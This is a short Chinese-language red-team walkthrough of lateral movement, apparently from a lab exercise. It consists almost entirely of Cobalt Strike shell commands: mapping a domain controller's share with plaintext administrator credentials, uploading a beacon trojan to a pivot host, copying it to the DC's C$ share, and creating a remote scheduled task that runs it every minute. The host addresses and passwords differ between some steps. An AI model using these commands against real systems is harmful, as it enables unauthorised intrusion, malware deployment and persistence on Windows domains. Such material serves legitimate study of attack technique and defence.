横向移动
横向移动
对 DC(10.10.10.2)目标主机建立共享连接,并查看目标主机共享资源。
1 | shell net use \\10.10.10.2 /user:administrator "JDredteam666" |
列出目标主机 C 盘下目录文件。
1 | shell dir \\10.10.10.2\C$ |
将CS木马上传到跳板机。
1 | upload C:\Users\asus\Desktop\beacon.exe (C:\Users\Server\Desktop\beacon.exe) |
将server(192.168.111.3)跳板机的木马文件copy到DC(10.10.10.2)目标机的C共享盘下。
1 | shell copy C:\Users\Server\Desktop\beacon.exe \\10.10.10.2\C$ |
远程创建Win 2012(192.168.200.66)目标机计划任务执行木马文件。
1 | shell schtasks /create /s 10.10.10.2 /u administrator /p "JDredteam" /sc MINUTE /mo 1 /tn test /tr "C:\\beacon.exe" |
成功上线,该会话为被动连接,不操作的不会回连,如果中转机会话断掉,该会话也会断掉。
